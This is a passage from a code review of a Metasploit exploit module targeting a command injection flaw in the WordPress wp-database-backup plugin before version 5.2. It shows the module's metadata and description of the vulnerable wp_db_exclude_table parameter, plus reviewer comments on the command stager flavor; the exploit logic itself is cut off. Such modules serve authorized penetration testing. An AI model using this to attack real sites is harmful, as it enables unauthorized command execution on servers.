modules/exploits/multi/http/wp_db_backup_rce.rb

```diff
@@ -0,0 +1,238 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Exploit::CmdStager
+  include Exploit::Powershell
+  include Exploit::Remote::HTTP::Wordpress
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WP Database Backup RCE',
+      'Description'    => %q(
+        There exists a command injection vulnerability in the Wordpress plugin
+        `wp-database-backup` for versions < 5.2.
+
+        For the backup functionality, the plugin generates a `mysqldump` command
+        to execute. The user can choose specific tables to exclude from the backup
+        by setting the `wp_db_exclude_table` parameter in a POST request to the
+        `wp-database-backup` page. The names of the excluded tables are included in
+        the `mysqldump` command unsanitized. Arbitrary commands injected through the
+        `wp_db_exclude_table` parameter are executed each time the functionality
+        for creating a new database backup are run.
+
+        Authentication is required to successfully exploit this vulnerability.
+      ),
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+      [
+        'Mikey Veenstra / Wordfence',  # Vulnerability Discovery
+        'Shelby Pace'                  # Metasploit module
+      ],
+      'References'     =>
+        [
+          [ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ],
+        ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'Targets'        =>
+        [
+          [
+            'Windows',
+            {
+              'Platform'        => 'win',
+              'Arch'            => [ ARCH_X86, ARCH_X64 ]
+            }
+          ],
+          [
+            'Linux',
+            {
+              'Platform'        =>  'linux',
+              'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
+              'CmdStagerFlavor' =>  'printf'
```

Comment:
Is this limited to `printf` because of badchars?

Reply:
No, I wasn't aware of the `noarg` option to remove `-ne` from the command line generated by the `echo` command stager flavor. I'll add that in and test it out.

Reply:
Gotcha. No problem!

Reply:
Tested with the `echo` command stager flavor, but couldn't get it to work properly.

Reply:
All good. `printf` is more predictable/portable, anyway.